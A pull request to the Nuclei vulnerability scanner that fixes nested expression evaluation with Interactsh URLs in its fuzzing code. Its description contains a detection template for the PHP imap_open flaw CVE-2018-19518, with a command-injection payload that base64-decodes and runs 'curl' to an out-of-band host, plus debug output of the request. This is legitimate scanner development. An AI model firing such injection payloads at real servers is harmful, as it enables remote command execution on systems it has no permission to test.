### PR TITLE
fuzz: fix missing expression evaluation before use

### DIFF
--- a/pkg/fuzz/execute.go
+++ b/pkg/fuzz/execute.go
@@ -11,6 +11,7 @@ import (
 	"github.com/projectdiscovery/nuclei/v3/pkg/fuzz/component"
 	"github.com/projectdiscovery/nuclei/v3/pkg/protocols"
 	"github.com/projectdiscovery/nuclei/v3/pkg/protocols/common/contextargs"
+	"github.com/projectdiscovery/nuclei/v3/pkg/protocols/common/expressions"
 	"github.com/projectdiscovery/nuclei/v3/pkg/protocols/common/generators"
 	"github.com/projectdiscovery/retryablehttp-go"
 	errorutil "github.com/projectdiscovery/utils/errors"
@@ -100,8 +101,11 @@ func (rule *Rule) Execute(input *ExecuteRuleInput) (err error) {
 	baseValues := input.Values
 	if rule.generator == nil {
 		for _, component := range finalComponentList {
+			// get vars from variables while replacing interactsh urls
 			evaluatedValues, interactURLs := rule.options.Variables.EvaluateWithInteractsh(baseValues, rule.options.Interactsh)
-			input.Values = generators.MergeMaps(evaluatedValues, baseValues, rule.options.Constants)
+			input.Values = generators.MergeMaps(evaluatedValues, baseValues, rule.options.Options.Vars.AsMap(), rule.options.Constants)
+			// evaluate all vars with interactsh
+			input.Values, interactURLs = rule.evaluateVarsWithInteractsh(input.Values, interactURLs)
 			input.InteractURLs = interactURLs
 			err := rule.executeRuleValues(input, component)
 			if err != nil {
@@ -118,9 +122,12 @@ mainLoop:
 			if !next {
 				continue mainLoop
 			}
+			// get vars from variables while replacing interactsh urls
 			evaluatedValues, interactURLs := rule.options.Variables.EvaluateWithInteractsh(generators.MergeMaps(values, baseValues), rule.options.Interactsh)
+			input.Values = generators.MergeMaps(values, evaluatedValues, baseValues, rule.options.Options.Vars.AsMap(), rule.options.Constants)
+			// evaluate all vars with interactsh
+			input.Values, interactURLs = rule.evaluateVarsWithInteractsh(input.Values, interactURLs)
 			input.InteractURLs = interactURLs
-			input.Values = generators.MergeMaps(values, evaluatedValues, baseValues, rule.options.Constants)
 
 			if err := rule.executeRuleValues(input, component); err != nil {
 				if err == io.EOF {
@@ -132,6 +139,33 @@ mainLoop:
 		}
 	}
 	return nil
+}
+
+// evaluateVarsWithInteractsh evaluates the variables with Interactsh URLs and updates them accordingly.
+func (rule *Rule) evaluateVarsWithInteractsh(data map[string]interface{}, interactshUrls []string) (map[string]interface{}, []string) {
+	// Check if Interactsh options are configured
+	if rule.options.Interactsh != nil {
+		// Iterate through the data to replace and evaluate variables with Interactsh URLs
+		for k, v := range data {
+			// Replace variables with Interactsh URLs and collect new URLs
+			got, oastUrls := rule.options.Interactsh.Replace(fmt.Sprint(v), interactshUrls)
+
+			// Append new OAST URLs if any
+			if len(oastUrls) > 0 {
+				interactshUrls = append(interactshUrls, oastUrls...)
+			}
+			// Evaluate the replaced data
+			evaluatedData, err := expressions.Evaluate(got, data)
+			if err == nil {
+				// Update the data if there is a change after evaluation
+				if evaluatedData != got {
+					data[k] = evaluatedData
+				}
+			}
+		}
+	}
+	// Return the updated data and Interactsh URLs without any error
+	return data, interactshUrls
 }
 
 // isInputURLValid returns true if url is valid after parsing it


### PR DESCRIPTION
### Proposed Changes

- fuzz: fix missing nested expression evaluation before using it in actual request
- closes #5020 

```yaml
id: CVE-2018-19518

info:
  name: PHP imap - Remote Command Execution
  author: princechaddha
  severity: high
  description: |
    University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19518
    - https://www.openwall.com/lists/oss-security/2018/11/22/3
    - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2018-19518
    cwe-id: CWE-88
  metadata:
    confidence: tenative
  tags: imap,dast,vulhub,cve,cve2018,rce,oast,php

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      php-imap:
        - "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}"

    fuzzing:
      - part: query
        fuzz:
          - "{{php-imap}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
```

```console
$ ./nuclei -u 'https://scanme.sh/path?test=123' -t b.yaml -debug -dast

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.3

		projectdiscovery.io

[INF] Current nuclei version: v3.2.3 (latest)
[INF] Current nuclei-templates version: v9.8.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 77
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.site
[INF] [CVE-2018-19518] Dumped HTTP request for https://scanme.sh/path?test=x+-oProxyCommand=echo+Y3VybCtjb2Ezb2JzbzQ3bXRvOTZnODVhZzNzZ25nazh6NmFmY2Iub2FzdC5zaXRl|base64+-d|sh}

GET /path?test=x+-oProxyCommand=echo+Y3VybCtjb2Ezb2JzbzQ3bXRvOTZnODVhZzNzZ25nazh6NmFmY2Iub2FzdC5zaXRl|base64+-d|sh} HTTP/1.1
Host: scanme.sh
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

[DBG] [CVE-2018-19518] Dumped HTTP response https://scanme.sh/path?test=x+-oProxyCommand=echo+Y3VybCtjb2Ezb2JzbzQ3bXRvOTZnODVhZzNzZ25nazh6NmFmY2Iub2FzdC5zaXRl|base64+-d|sh}

HTTP/1.1 200 OK
Connection: close
Content-Length: 2
Content-Type: text/plain; charset=utf-8
Date: Mon, 08 Apr 2024 18:49:20 GMT

ok
[INF] No results found. Better luck next time!
```

```console
$  pbpaste | base64 -d | bninja url -d
curl coa3obso47mto96g85ag3sgngk8z6afcb.oast.site%                                                                      
```